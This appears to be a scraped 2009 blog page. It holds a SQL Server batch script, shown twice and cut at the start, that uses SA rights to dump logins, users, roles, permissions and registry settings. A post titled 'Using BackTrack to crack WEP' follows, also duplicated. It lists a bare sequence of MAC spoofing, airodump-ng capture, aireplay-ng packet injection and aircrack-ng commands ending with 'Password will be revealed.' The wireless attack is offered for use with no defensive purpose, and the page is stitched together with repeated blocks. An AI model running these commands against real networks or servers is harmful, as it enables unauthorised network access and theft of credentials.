REM Replace % DB_Review % with Database name
ECHO -- Obtain all logins from the database
OSQL -E -S %Server_Name% -Q "use master select * from master.dbo.syslogins" -s "," -w2000 -E -o %OUTPUT_PATH%\syslogins.txt
ECHO -- Obtain patch version
OSQL -E -S %Server_Name% -Q "select @@version" -s "," -w2000 -E -o %OUTPUT_PATH%\version.txt
ECHO -- Obtain names of databases defined within the SQL server instance
OSQL -E -S %Server_Name% -Q "select name from master.dbo.sysdatabases" -s "," -w2000 -E -o %OUTPUT_PATH%\active_db.txt
ECHO -- Obtain users from database under analysis
OSQL -E -S %Server_Name% -Q "use %DB_REVIEW% select uid, name, createdate, updatedate, hasdbaccess, islogin, isntname, isntgroup, isntuser, issqluser, isaliased, issqlrole, isapprole from sysusers where islogin = 1" -s "," -w2000 -E -o %OUTPUT_PATH%\db_users.txt
ECHO -- Obtain users from master database
OSQL -E -S %Server_Name% -Q "use master select uid, name, createdate, updatedate, hasdbaccess, islogin, isntname, isntgroup, isntuser, issqluser, isaliased, issqlrole, isapprole from sysusers where islogin = 1" -s "," -w2000 -E -o %OUTPUT_PATH%\master_users.txt
ECHO -- Obtain authentication mode for the sql_server instance
OSQL -E -S %Server_Name% -Q "master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='%Reg_address%',@value_name='LoginMode'" -s "," -w2000 -E -o %OUTPUT_PATH%\Authen_mode.txt
ECHO -- Obtain advanced option parameters for sql server instance
OSQL -E -S %Server_Name% -Q "USE master EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVERRIDE"
OSQL -E -S %Server_Name% -Q "master..sp_configure" -s "," -w2000 -E -o %OUTPUT_PATH%\configuration.txt
ECHO -- Obtain audit level being used
OSQL -E -S %Server_Name% -Q "master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='%Reg_address%',@value_name='AuditLevel'" -s "," -w2000 -E -o %OUTPUT_PATH%\Audit_level.txt
ECHO -- Obtain default login being used for NT authentication
OSQL -E -S %Server_Name% -Q "master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='%Reg_address%',@value_name='DefaultLogin'" -s "," -w2000 -E -o%OUTPUT_PATH%\Default_logon.txt
ECHO -- Obtain membership of all fixed server roles
OSQL -E -S %Server_Name% -Q "master..sp_helpsrvrolemember" -s "," -w2000 -E -o %OUTPUT_PATH%\srvrolemember.txt
ECHO -- Obtain all database roles (application and database) in database under review
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_helprole" -s "," -w2000 -E -o %OUTPUT_PATH%\DB_and_App_roles.txt
ECHO -- Obtain membership of all fixed and custom database roles
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_helprolemember" -s "," -w2000 -E -o %OUTPUT_PATH%\DB_roles.txt
ECHO -- Obtain permissions on stored procedures and tables in database under review
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_helprotect" -s "," -w2000 -E -o %OUTPUT_PATH%\permissions_DB.txt
ECHO -- Obtain permissions on stored procedures and tables in master
OSQL -E -S %Server_Name% -Q "master..sp_helprotect" -s "," -w2000 -E -o %OUTPUT_PATH%\permissions_master.txt
ECHO -- Obtain orphaned users in database under review
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_change_users_login @Action='Report'" -s "," -w2000 -E -o %OUTPUT_PATH%\orphaned_users.txt
ECHO Extraction complete
PAUSE
--->END SCRIPT<---
You need to have SA priveledges to the SQL Dbase to run.
--->START SCRIPT<---
REM Replace % Server_Name % with ServerName
REM Replace % OUTPUT_PATH % with Output location
REM Replace % DB_Review % with Database name
ECHO -- Obtain all logins from the database
OSQL -E -S %Server_Name% -Q "use master select * from master.dbo.syslogins" -s "," -w2000 -E -o %OUTPUT_PATH%\syslogins.txt
ECHO -- Obtain patch version
OSQL -E -S %Server_Name% -Q "select @@version" -s "," -w2000 -E -o %OUTPUT_PATH%\version.txt
ECHO -- Obtain names of databases defined within the SQL server instance
OSQL -E -S %Server_Name% -Q "select name from master.dbo.sysdatabases" -s "," -w2000 -E -o %OUTPUT_PATH%\active_db.txt
ECHO -- Obtain users from database under analysis
OSQL -E -S %Server_Name% -Q "use %DB_REVIEW% select uid, name, createdate, updatedate, hasdbaccess, islogin, isntname, isntgroup, isntuser, issqluser, isaliased, issqlrole, isapprole from sysusers where islogin = 1" -s "," -w2000 -E -o %OUTPUT_PATH%\db_users.txt
ECHO -- Obtain users from master database
OSQL -E -S %Server_Name% -Q "use master select uid, name, createdate, updatedate, hasdbaccess, islogin, isntname, isntgroup, isntuser, issqluser, isaliased, issqlrole, isapprole from sysusers where islogin = 1" -s "," -w2000 -E -o %OUTPUT_PATH%\master_users.txt
ECHO -- Obtain authentication mode for the sql_server instance
OSQL -E -S %Server_Name% -Q "master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='%Reg_address%',@value_name='LoginMode'" -s "," -w2000 -E -o %OUTPUT_PATH%\Authen_mode.txt
ECHO -- Obtain advanced option parameters for sql server instance
OSQL -E -S %Server_Name% -Q "USE master EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVERRIDE"
OSQL -E -S %Server_Name% -Q "master..sp_configure" -s "," -w2000 -E -o %OUTPUT_PATH%\configuration.txt
ECHO -- Obtain audit level being used
OSQL -E -S %Server_Name% -Q "master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='%Reg_address%',@value_name='AuditLevel'" -s "," -w2000 -E -o %OUTPUT_PATH%\Audit_level.txt
ECHO -- Obtain default login being used for NT authentication
OSQL -E -S %Server_Name% -Q "master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='%Reg_address%',@value_name='DefaultLogin'" -s "," -w2000 -E -o%OUTPUT_PATH%\Default_logon.txt
ECHO -- Obtain membership of all fixed server roles
OSQL -E -S %Server_Name% -Q "master..sp_helpsrvrolemember" -s "," -w2000 -E -o %OUTPUT_PATH%\srvrolemember.txt
ECHO -- Obtain all database roles (application and database) in database under review
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_helprole" -s "," -w2000 -E -o %OUTPUT_PATH%\DB_and_App_roles.txt
ECHO -- Obtain membership of all fixed and custom database roles
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_helprolemember" -s "," -w2000 -E -o %OUTPUT_PATH%\DB_roles.txt
ECHO -- Obtain permissions on stored procedures and tables in database under review
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_helprotect" -s "," -w2000 -E -o %OUTPUT_PATH%\permissions_DB.txt
ECHO -- Obtain permissions on stored procedures and tables in master
OSQL -E -S %Server_Name% -Q "master..sp_helprotect" -s "," -w2000 -E -o %OUTPUT_PATH%\permissions_master.txt
ECHO -- Obtain orphaned users in database under review
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_change_users_login @Action='Report'" -s "," -w2000 -E -o %OUTPUT_PATH%\orphaned_users.txt
ECHO Extraction complete
PAUSE
--->END SCRIPT<---
Thursday, April 2, 2009
Using BackTrack to crack WEP
open Konsole - Type the following!
modprobe -r iwl3945
modprobe ipwraw
iwconfig
airmon-ng stop wifi0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng wifi0
airodump-ng -c 2 -w network.out --bssid [Target MAC Address] wifi0
aireplay-ng -1 0 -a [Target MAC Address] -h 00:11:22:33:44:55 -e [Target ESSID name] wifi0
aireplay-ng 2 -3 -b [Target MAC Address] -h 00:11:22:33:44:55 wifi0
aircrack-ng -n 128 -b [Target MAC Address] network.out-01.cap
Password will be revealed.
modprobe -r iwl3945
modprobe ipwraw
iwconfig
airmon-ng stop wifi0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng wifi0
airodump-ng -c 2 -w network.out --bssid [Target MAC Address] wifi0
aireplay-ng -1 0 -a [Target MAC Address] -h 00:11:22:33:44:55 -e [Target ESSID name] wifi0
aireplay-ng 2 -3 -b [Target MAC Address] -h 00:11:22:33:44:55 wifi0
aircrack-ng -n 128 -b [Target MAC Address] network.out-01.cap
Password will be revealed.
Subscribe to:
Posts (Atom)